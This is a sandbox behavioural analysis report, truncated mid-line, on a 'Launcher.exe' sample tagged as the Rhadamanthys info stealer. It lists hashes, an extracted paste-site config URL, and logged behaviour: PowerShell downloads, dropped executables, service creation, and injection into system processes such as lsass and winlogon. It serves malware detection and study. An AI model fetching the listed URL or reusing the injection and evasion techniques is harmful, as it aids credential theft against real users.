Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
13-06-2024 23:52
Static task
static1
Behavioral task
behavioral1
Sample
Launcher.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Launcher.exe
Resource
win10v2004-20240611-en
General
-
Target
Launcher.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
gpldtnem.g1w2.exedescription pid process target process PID 1212 created 3000 1212 gpldtnem.g1w2.exe svchost.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 1884 powershell.exe 4 1884 powershell.exe -
Processes:
powershell.exepowershell.exepid process 1884 powershell.exe 1916 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Launcher.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation Launcher.exe -
Executes dropped EXE 2 IoCs
Processes:
gpldtnem.g1w2.exegpldtnem.g1w3.exepid process 1212 gpldtnem.g1w2.exe 468 gpldtnem.g1w3.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 10 IoCs
Processes:
svchost.exesvchost.exesvchost.exegpldtnem.g1w3.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\MRT.exe gpldtnem.g1w3.exe File opened for modification C:\Windows\System32\Winevt\Logs\Setup.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
gpldtnem.g1w3.exedescription pid process target process PID 468 set thread context of 2192 468 gpldtnem.g1w3.exe dialer.exe -
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1060 sc.exe 3500 sc.exe 3664 sc.exe 1028 sc.exe 1940 sc.exe 4368 sc.exe 3008 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
chrome.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 14 IoCs
Processes:
chrome.exesvchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133627964322342878" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718322879" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe -
Modifies registry class 44 IoCs
Processes:
Explorer.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f80cb859f6720028040b29b5540cc05aab60000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616209" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe110000002f0283c647bcda011c44a64d52bcda011c44a64d52bcda0114000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\IconSize = "48" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668} Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3452 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exegpldtnem.g1w2.exedialer.exegpldtnem.g1w3.exepowershell.exedialer.exepid process 1884 powershell.exe 1884 powershell.exe 1212 gpldtnem.g1w2.exe 1212 gpldtnem.g1w2.exe 4864 dialer.exe 4864 dialer.exe 4864 dialer.exe 4864 dialer.exe 468 gpldtnem.g1w3.exe 1916 powershell.exe 1916 powershell.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 468 gpldtnem.g1w3.exe 2192 dialer.exe 2192 dialer.exe 468 gpldtnem.g1w3.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe 2192 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3452 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
chrome.exepid process 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exegpldtnem.g1w3.exedialer.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exesvchost.exeExplorer.EXEchrome.exesvchost.exedescription pid process Token: SeDebugPrivilege 1884 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeDebugPrivilege 468 gpldtnem.g1w3.exe Token: SeDebugPrivilege 2192 dialer.exe Token: SeShutdownPrivilege 3540 powercfg.exe Token: SeCreatePagefilePrivilege 3540 powercfg.exe Token: SeShutdownPrivilege 3548 powercfg.exe Token: SeCreatePagefilePrivilege 3548 powercfg.exe Token: SeShutdownPrivilege 3396 powercfg.exe Token: SeCreatePagefilePrivilege 3396 powercfg.exe Token: SeShutdownPrivilege 440 powercfg.exe Token: SeCreatePagefilePrivilege 440 powercfg.exe Token: SeAuditPrivilege 2288 svchost.exe Token: SeAuditPrivilege 2288 svchost.exe Token: SeAuditPrivilege 1656 svchost.exe Token: SeAuditPrivilege 1656 svchost.exe Token: SeShutdownPrivilege 3452 Explorer.EXE Token: SeCreatePagefilePrivilege 3452 Explorer.EXE Token: SeShutdownPrivilege 3452 Explorer.EXE Token: SeCreatePagefilePrivilege 3452 Explorer.EXE Token: SeAuditPrivilege 1656 svchost.exe Token: SeAuditPrivilege 1656 svchost.exe Token: SeShutdownPrivilege 3452 Explorer.EXE Token: SeCreatePagefilePrivilege 3452 Explorer.EXE Token: SeShutdownPrivilege 4340 chrome.exe Token: SeCreatePagefilePrivilege 4340 chrome.exe Token: SeShutdownPrivilege 4340 chrome.exe Token: SeCreatePagefilePrivilege 4340 chrome.exe Token: SeShutdownPrivilege 4340 chrome.exe Token: SeCreatePagefilePrivilege 4340 chrome.exe Token: SeShutdownPrivilege 3452 Explorer.EXE Token: SeCreatePagefilePrivilege 3452 Explorer.EXE Token: SeShutdownPrivilege 3452 Explorer.EXE Token: SeCreatePagefilePrivilege 3452 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2016 svchost.exe Token: SeIncreaseQuotaPrivilege 2016 svchost.exe Token: SeSecurityPrivilege 2016 svchost.exe Token: SeTakeOwnershipPrivilege 2016 svchost.exe Token: SeLoadDriverPrivilege 2016 svchost.exe Token: SeSystemtimePrivilege 2016 svchost.exe Token: SeBackupPrivilege 2016 svchost.exe Token: SeRestorePrivilege 2016 svchost.exe Token: SeShutdownPrivilege 2016 svchost.exe Token: SeSystemEnvironmentPrivilege 2016 svchost.exe Token: SeUndockPrivilege 2016 svchost.exe Token: SeManageVolumePrivilege 2016 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2016 svchost.exe Token: SeIncreaseQuotaPrivilege 2016 svchost.exe Token: SeSecurityPrivilege 2016 svchost.exe Token: SeTakeOwnershipPrivilege 2016 svchost.exe Token: SeLoadDriverPrivilege 2016 svchost.exe Token: SeSystemtimePrivilege 2016 svchost.exe Token: SeBackupPrivilege 2016 svchost.exe Token: SeRestorePrivilege 2016 svchost.exe Token: SeShutdownPrivilege 2016 svchost.exe Token: SeSystemEnvironmentPrivilege 2016 svchost.exe Token: SeUndockPrivilege 2016 svchost.exe Token: SeManageVolumePrivilege 2016 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2016 svchost.exe Token: SeIncreaseQuotaPrivilege 2016 svchost.exe Token: SeSecurityPrivilege 2016 svchost.exe Token: SeTakeOwnershipPrivilege 2016 svchost.exe Token: SeLoadDriverPrivilege 2016 svchost.exe Token: SeSystemtimePrivilege 2016 svchost.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
Processes:
chrome.exepid process 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exepid process 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe 4340 chrome.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
Explorer.EXEpid process 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE 3452 Explorer.EXE -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEpid process 3588 RuntimeBroker.exe 3452 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Launcher.exepowershell.exegpldtnem.g1w2.execmd.exegpldtnem.g1w3.exedialer.exedescription pid process target process PID 3044 wrote to memory of 1884 3044 Launcher.exe powershell.exe PID 3044 wrote to memory of 1884 3044 Launcher.exe powershell.exe PID 1884 wrote to memory of 1212 1884 powershell.exe gpldtnem.g1w2.exe PID 1884 wrote to memory of 1212 1884 powershell.exe gpldtnem.g1w2.exe PID 1884 wrote to memory of 1212 1884 powershell.exe gpldtnem.g1w2.exe PID 1884 wrote to memory of 468 1884 powershell.exe gpldtnem.g1w3.exe PID 1884 wrote to memory of 468 1884 powershell.exe gpldtnem.g1w3.exe PID 1212 wrote to memory of 4864 1212 gpldtnem.g1w2.exe dialer.exe PID 1212 wrote to memory of 4864 1212 gpldtnem.g1w2.exe dialer.exe PID 1212 wrote to memory of 4864 1212 gpldtnem.g1w2.exe dialer.exe PID 1212 wrote to memory of 4864 1212 gpldtnem.g1w2.exe dialer.exe PID 1212 wrote to memory of 4864 1212 gpldtnem.g1w2.exe dialer.exe PID 4224 wrote to memory of 4244 4224 cmd.exe wusa.exe PID 4224 wrote to memory of 4244 4224 cmd.exe wusa.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 468 wrote to memory of 2192 468 gpldtnem.g1w3.exe dialer.exe PID 2192 wrote to memory of 612 2192 dialer.exe winlogon.exe PID 2192 wrote to memory of 676 2192 dialer.exe lsass.exe PID 2192 wrote to memory of 960 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 384 2192 dialer.exe dwm.exe PID 2192 wrote to memory of 408 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1052 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1136 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1160 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1168 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1180 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1244 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1296 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1332 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1412 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1496 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1536 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1544 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1656 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1680 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1744 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1764 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1852 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1968 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2016 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1712 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 1704 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2068 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2124 2192 dialer.exe spoolsv.exe PID 2192 wrote to memory of 2288 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 2388 2192 dialer.exe svchost.exe PID 2192 wrote to memory of 